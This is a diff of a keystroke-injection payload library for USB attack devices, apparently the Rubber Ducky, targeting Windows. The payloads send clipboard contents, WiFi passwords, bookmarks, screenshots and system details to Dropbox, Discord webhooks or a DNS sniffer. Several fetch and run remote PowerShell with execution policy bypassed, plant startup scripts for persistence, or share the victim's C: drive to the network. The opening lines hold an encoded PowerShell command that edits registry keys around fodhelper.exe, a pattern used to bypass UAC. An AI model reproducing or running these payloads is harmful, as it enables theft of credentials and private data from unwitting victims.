STRING powershell -NoP -NonI STRINGLN powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
DELAY 500
ENTER
DELAY 500
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
DELAY 200
ENTER

203
payloads/library/exfiltration/ Hard_Con_Exfil/payload.txt
View File

@ -1,189 +1,88 @@
REM Title: Hard_Con_Exfil REM_BLOCK
REM Author: LulzAnarchyAnon Title: Hard_Con_Exfil
REM Description: This payload navagates it's way to Hardware, and Connection properties. Author: LulzAnarchyAnon
REM It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder. Description: This payload navagates it's way to Hardware, and Connection properties.
REM It is then exfiltrated via a DropBox Upload. It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
REM Target: Windows 10 It is then exfiltrated via a DropBox Upload.
REM Props: Darren Kitchen Target: Windows 10
REM Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script! Props: Darren Kitchen
REM Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads. Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
REM Props: Don't forget to Like and Subscribe! Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM Version: 1.0 Props: Don't forget to Like and Subscribe!
REM Category: Exfiltration Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices. Attacker, and Target devices.
REM In the First stage the targets data is saved to the target device. In the First stage the targets data is saved to the target device.
REM In the Second stage the loot is uploaded via dropbox. In the Second stage the loot is uploaded via dropbox.
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM Stage 1 REM Stage 1
GUI GUI
DELAY 100 STRINGLN network properties
STRING network properties REPEAT 3 TAB
DELAY 200
ENTER ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 1000
ENTER
DELAY 500
GUI r GUI r
DELAY 500 STRINGLN notepad
STRING notepad
ENTER
DELAY 500
CTRL v CTRL v
DELAY 500
CTRL s CTRL s
DELAY 500
ALT d ALT d
DELAY 500 STRINGLN %USERPROFILE%\Downloads
STRING %USERPROFILE%\Downloads REPEAT 6 TAB
DELAY 500 STRINGLN targetloot
ENTER REPEAT 2 ALT F4
DELAY 200
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
STRING targetloot
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
ALT F4
DELAY 2000 DELAY 2000
REM Stage 2 REM Stage 2
GUI r GUI r
DELAY 200
STRING powershell STRING powershell
DELAY 200
ENTER ENTER
DELAY 2000 DELAY 2000
STRING function DropBox-Upload { STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
DELAY 500 STRINGLN param (
ENTER STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRING [CmdletBinding()] STRINGLN [string]$SourceFilePath
DELAY 500 STRINGLN )
ENTER STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRING param ( STRINGLN "
STRINGLN " # Replace with your DropBox Access Token
DELAY 500 STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
ENTER STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)] STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500 STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
ENTER STRINGLN $headers.Add("Authorization", $authorization)
STRING [Alias("f")] STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500 STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
ENTER STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING" # Replace with your DropBox Access Token
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING } STRING }
DELAY 5000 DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING targetloot STRING targetloot
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING targetloot STRING targetloot
DELAY 500
ALT h ALT h
DELAY 200 REPEAT 5 TAB
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
ENTER ENTER
DELAY 500
ALT F4 ALT F4
DELAY 1000 DELAY 1000
CTRL v CTRL v
DELAY 5000 DELAY 5000
STRING | DropBox-Upload STRINGLN | DropBox-Upload
DELAY 500
ENTER
DELAY 5000 DELAY 5000
ENTER ENTER
ALT F4 ALT F4
DELAY 100
ENTER ENTER

21
payloads/library/exfiltration/Bookmark-Hog/payload.txt
View File

@ -1,16 +1,17 @@
REM Title: Bookmark-Hog REM_BLOCK
Title: Bookmark-Hog
Author: atomiczsec
Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
Target: Windows 10, 11
REM Author: atomiczsec Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky DEFINE #URL <Your Shared link for the intended file>
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

26
payloads/library/exfiltration/Copy-And-Waste/payload.txt
View File

@ -1,17 +1,19 @@
REM Title: Copy-And-Waste REM_BLOCK
Title: Copy-And-Waste
Author: atomiczsec & I am Jakoby
Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
Target: Windows 10, 11
REM Author: atomiczsec & I am Jakoby Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook DEFINE #URL PASTEBIN LINK FOR BAT
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download GUI r
REM Also remember to put in your discord webhook in c.ps1 DELAY 100
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URL).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URL).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

113
payloads/library/exfiltration/Exfil-to-Plug/payload.txt
View File

@ -1,101 +1,78 @@
REM -------------------------------------------------------------------- REM_BLOCK
REM Title: O.MG Plug Basic Local Exfiltrator --------------------------------------------------------------------
REM Description: Exfiltrates via O.MG WebSocket API Title: O.MG Plug Basic Local Exfiltrator
REM Author: thisismyrobot Description: Exfiltrates via O.MG WebSocket API
REM Target: Windows 10 (PowerShell) Author: thisismyrobot
REM Version: 1.0 Target: Windows 10 (PowerShell)
REM Category: Exfiltration Version: 1.0
REM Category: Exfiltration
REM Local exfiltration for O.MG Plug Basic
REM
REM The Basic version of the Plug cannot do stuff like sharing a local
REM storage device (at least at the time of writing), so this code
REM does local exfil by connecting the target to the O.MG Plug's own
REM WiFi and using WebSockets to save data to a setting.
REM
REM This assumes a WiFi-enabled target of course.
REM
REM Retrieve the data by using the CTList custom command under Debug.
REM
REM Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
REM --------------------------------------------------------------------
Local exfiltration for O.MG Plug Basic
The Basic version of the Plug cannot do stuff like sharing a local
storage device (at least at the time of writing), so this code
does local exfil by connecting the target to the O.MG Plug's own
WiFi and using WebSockets to save data to a setting.
This assumes a WiFi-enabled target of course.
Retrieve the data by using the CTList custom command under Debug.
Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
--------------------------------------------------------------------
END_REM
DEFINE #PASSWORD Secret password
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500 DEFAULT_DELAY 500
GUI r GUI r
DELAY 500 STRINGLN powershell
STRING powershell STRINGLN cd c:\temp
ENTER
DELAY 1000
STRING cd c:\temp
ENTER
REM ----------------------- REM -----------------------
REM Collect info to exfil. REM Collect info to exfil.
REM ----------------------- REM -----------------------
STRING $e = "Secret password" STRING $e = "#PASSWORD"
ENTER ENTER
REM ---------------------------------- REM ----------------------------------
REM Connect to the O.MG AP. REM Connect to the O.MG AP.
REM ---------------------------------- REM ----------------------------------
STRING echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml STRINGLN echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
ENTER
STRING netsh wlan add profile "profile.xml" STRINGLN netsh wlan add profile "profile.xml"
ENTER
STRING netsh wlan connect name=O.MG STRINGLN netsh wlan connect name=O.MG
ENTER
REM -------------------------------- REM --------------------------------
REM Establish websocket connection. REM Establish websocket connection.
REM -------------------------------- REM --------------------------------
STRING $ws = New-Object Net.WebSockets.ClientWebSocket STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket
ENTER STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
STRING $ct = New-Object Threading.CancellationToken($false) STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
STRING $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
ENTER
STRING do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
REM -------- REM --------
REM Upload. REM Upload.
REM -------- REM --------
STRING $ct = New-Object Threading.CancellationToken($false) STRINGLN $ct = New-Object Threading.CancellationToken($false)
ENTER STRINGLN $command = "[custom]CTSet`tcaptured`t$e"
STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
STRING $command = "[custom]CTSet`tcaptured`t$e" STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
STRING [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
ENTER
STRING $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
DELAY 1000 DELAY 1000
REM ---------- REM ----------
REM Clean up. REM Clean up.
REM ---------- REM ----------
STRING netsh wlan disconnect STRINGLN netsh wlan disconnect
ENTER STRINGLN netsh wlan delete profile name="O.MG"
STRINGLN del .\profile.xml
STRING netsh wlan delete profile name="O.MG" STRINGLN exit
ENTER
STRING del .\profile.xml
ENTER
STRING exit
ENTER

27
payloads/library/exfiltration/Powershell-History/payload.txt
View File

@ -1,16 +1,17 @@
REM Title: Powershell-History REM_BLOCK
Title: Powershell-History
REM Author: atomiczsec Author: atomiczsec
Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

26
payloads/library/exfiltration/Printer-Recon/payload.txt
View File

@ -1,16 +1,20 @@
REM Title: Printer-Recon REM_BLOCK
Title: Printer-Recon
Author: atomiczsec
REM Author: atomiczsec Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

41
payloads/library/exfiltration/Priv-Paths/payload.txt
View File

@ -1,25 +1,20 @@
REM Title: Priv-Paths REM_BLOCK
REM Author: atomiczsec Title: Priv-Paths
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. Author: atomiczsec
REM Target: Windows 10 Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
Target: Windows 10
END_REM
DEFINE #WEBHOOKURL YOUR-DISCORD-WEBHOOK
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
DELAY 3000
GUI r GUI r
DELAY 1000 STRINGLN cmd
STRING cmd STRINGLN cd %HOMEPATH%
ENTER STRINGLN wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
DELAY 500 STRINGLN curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" #WEBHOOKURL
STRING cd %HOMEPATH% STRINGLN del p.txt
ENTER STRINGLN exit
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER

28
payloads/library/exfiltration/Pwn-Drive/payload.txt
View File

@ -1,16 +1,18 @@
REM Title: Pwn-Drive REM_BLOCK
Title: Pwn-Drive
REM Author: atomiczsec Author: atomiczsec
Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl

27
payloads/library/exfiltration/Screen-Shock/payload.txt
View File

@ -1,17 +1,22 @@
REM Title: Screen-Shock REM_BLOCK
Title: Screen-Shock
Author: atomiczsec
REM Author: atomiczsec Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) Target: Windows 10
REM Target: Windows 10 Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
DEFINE #URLBAT PASTEBIN LINK FOR BAT
DEFINE #URLPS1 PASTEBIN LINK FOR PS1
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download GUI r
REM Also remember to put in your discord webhook in c.ps1 DELAY 500
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URLPS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

23
payloads/library/exfiltration/Spotify-Spy/payload.txt
View File

@ -1,16 +1,21 @@
REM Title: Spotify-Spy REM_BLOCK
Title: Spotify-Spy
REM Author: atomiczsec Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10 Target: Windows 10
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

29
payloads/library/exfiltration/WiFi2DNS/WiFi2DNS.txt
View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: DNS Exfiltrate WiFi names and preshared key # Title: DNS Exfiltrate WiFi names and preshared key
# Description: Exfiltrates WiFi names and PSK using DNS # Description: Exfiltrates WiFi names and PSK using DNS
# Author: Keld Norman / Twitter: @keld_norman # Author: Keld Norman / Twitter: @keld_norman
@ -20,29 +21,17 @@
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet.. # Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
# #
# TODO: This only works for WiFi names without space in the name. # TODO: This only works for WiFi names without space in the name.
# END_REM
DUCKY_LANG US DUCKY_LANG US
REM Target: WINDOWS DELAY 2000
REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS DEFAULT_DELAY 500
DELAY 3000
CONTROL ESCAPE CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER CTRL-SHIFT ENTER
DELAY 1000
ALT Y ALT Y
DELAY 500
ENTER
DELAY 500
STRING @echo off
DELAY 500
ENTER
DELAY 500
STRING for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
DELAY 500
ENTER
DELAY 500
STRING exit
DELAY 500
ENTER ENTER
STRINGLN @echo off
STRINGLN for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
STRINGLN exit

94
payloads/library/exfiltration/WiFi2DNS_AES256/payload.txt
View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS # Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256 # Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
# Author: Keld Norman / Twitter: @keld_norman # Author: Keld Norman / Twitter: @keld_norman
@ -18,57 +19,48 @@
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block) 3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
4. The last line called $encoded will produce an output that is the powershell code in an encoded form 4. The last line called $encoded will produce an output that is the powershell code in an encoded form
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string 4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
END_REM
DUCKY_LANG US DUCKY_LANG US
GUI R DELAY 2000
DELAY 2
STRING cmd.exe
DELAY 1
ENTER
STRING powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE
ENTER
#----------------------------------------------------------------------------------------------------------- GUI r
# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC DELAY 500
#----------------------------------------------------------------------------------------------------------- STRINGLN cmd.exe
DELAY 500
$scriptblock={ STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={
function enc{[CmdletBinding()][OutputType([string])] STRINGLN function enc{[CmdletBinding()][OutputType([string])]
Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T) STRINGLN Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
$sha=New-Object System.Security.Cryptography.SHA256Managed STRINGLN $sha=New-Object System.Security.Cryptography.SHA256Managed
$aes=New-Object System.Security.Cryptography.AesManaged STRINGLN $aes=New-Object System.Security.Cryptography.AesManaged
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC STRINGLN $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
$aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros STRINGLN $aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
$aes.BlockSize=128 STRINGLN $aes.BlockSize=128
$aes.KeySize=256 STRINGLN $aes.KeySize=256
$aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K)) STRINGLN $aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
$byt=[System.Text.Encoding]::UTF8.GetBytes($T) STRINGLN $byt=[System.Text.Encoding]::UTF8.GetBytes($T)
$cry=$aes.CreateEncryptor() STRINGLN $cry=$aes.CreateEncryptor()
$enc=$cry.TransformFinalBlock($byt,0,$byt.Length) STRINGLN $enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
$enc=$aes.IV+$enc STRINGLN $enc=$aes.IV+$enc
$aes.Dispose() STRINGLN $aes.Dispose()
$sha.Dispose() STRINGLN $sha.Dispose()
$b64=[System.Convert]::ToBase64String($enc).ToCharArray() STRINGLN $b64=[System.Convert]::ToBase64String($enc).ToCharArray()
